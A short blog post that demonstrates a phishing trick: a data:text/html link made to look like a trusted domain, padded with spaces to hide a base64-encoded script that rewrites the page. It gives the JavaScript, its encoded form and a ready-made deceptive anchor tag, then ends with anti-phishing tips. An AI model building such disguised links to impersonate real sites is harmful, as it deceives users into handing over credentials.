Sneaky phishing method in modern browsers

Chrome, Firefox and most other modern browsers allow you to execute base64 encoded data via data:text/html. For example we could prepend „data:text/html,“ to a trustworthy URL like „trustme.com“ and instead of loading the displayed url we execute a bunch of other stuff encoded in our following script tag (yeah I know a programmer would not fall for it, but your parents will!)

data:text/html,trustme.com <script src=data:text/html;base64,{BASE64 ENCODED JS}></script>

{BASE64 ENCODED JS} can be replaced with any js. With some lines of code we can load anything we want and make the user believe he is browsing on trustme.com.

window.document.title = "Some test title";
window.document.body.outerHTML = "<iframe src=\"http://example.com\" style=\"border: 0;width: 100%;height:100%\"></iframe>";
window.document.body.style.padding = "0";
window.document.body.style.margin = "0";

The whole code base64 encoded:

d2luZG93LmRvY3VtZW50LnRpdGxlID0gIlNvbWUgdGVzdCB0aXRsZSI7DQp3aW5kb3cuZG9jdW1lbnQuYm9keS5vdXRlckhUTUwgPSAiPGlmcmFtZSBzcmM9XCJodHRwOi8vZXhhbXBsZS5jb21cIiBzdHlsZT1cImJvcmRlcjogMDt3aWR0aDogMTAwJTtoZWlnaHQ6MTAwJVwiPjwvaWZyYW1lPiI7DQp3aW5kb3cuZG9jdW1lbnQuYm9keS5zdHlsZS5wYWRkaW5nID0gIjAiOw0Kd2luZG93LmRvY3VtZW50LmJvZHkuc3R5bGUubWFyZ2luID0gIjAiOw==

URL:

data:text/html,https://www.trust.me <script src=data:text/html;base64,d2luZG93LmRvY3VtZW50LnRpdGxlID0gIlNvbWUgdGVzdCB0aXRsZSI7DQp3aW5kb3cuZG9jdW1lbnQuYm9keS5vdXRlckhUTUwgPSAiPGlmcmFtZSBzcmM9XCJodHRwOi8vZXhhbXBsZS5jb21cIiBzdHlsZT1cImJvcmRlcjogMDt3aWR0aDogMTAwJTtoZWlnaHQ6MTAwJVwiPjwvaWZyYW1lPiI7DQp3aW5kb3cuZG9jdW1lbnQuYm9keS5zdHlsZS5wYWRkaW5nID0gIjAiOw0Kd2luZG93LmRvY3VtZW50LmJvZHkuc3R5bGUubWFyZ2luID0gIjAiOw==></script>

Add some spaces to the url and build a simple link so it doesn’t look suspicious and here we go:

<a href="data:text/html,https://www.trust.me                                                                                                                                                                                                                                                                        <script src=data:text/html;base64,d2luZG93LmRvY3VtZW50LnRpdGxlID0gIlNvbWUgdGVzdCB0aXRsZSI7DQp3aW5kb3cuZG9jdW1lbnQuYm9keS5vdXRlckhUTUwgPSAiPGlmcmFtZSBzcmM9XCJodHRwOi8vZXhhbXBsZS5jb21cIiBzdHlsZT1cImJvcmRlcjogMDt3aWR0aDogMTAwJTtoZWlnaHQ6MTAwJVwiPjwvaWZyYW1lPiI7DQp3aW5kb3cuZG9jdW1lbnQuYm9keS5zdHlsZS5wYWRkaW5nID0gIjAiOw0Kd2luZG93LmRvY3VtZW50LmJvZHkuc3R5bGUubWFyZ2luID0gIjAiOw==></script>">Click here to load example.com in an iframe via js</a>

Examples:

Removed some spaces from the snippet.

So many spaces, that the script isn’t even visible.

 

 

 

 

 

 

How can I prevent getting phished like this?

  1. Use password managers that preserve your login urls (keepass, 1password, etc.).
  2. Don’t click on stuff in E-Mails ;D
  3. Check the certificate in your browser.
  4. Never login on any site after you opened it out of an email.

More about this topic:

  1. Gist by timruffles
  2. @tomscott
 

Felix

 

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.

Diese Website verwendet Akismet, um Spam zu reduzieren. Erfahre mehr darüber, wie deine Kommentardaten verarbeitet werden.